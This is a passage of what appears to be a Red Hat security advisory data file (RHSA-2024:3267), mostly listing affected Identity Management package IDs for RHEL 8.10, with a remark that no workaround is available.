"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
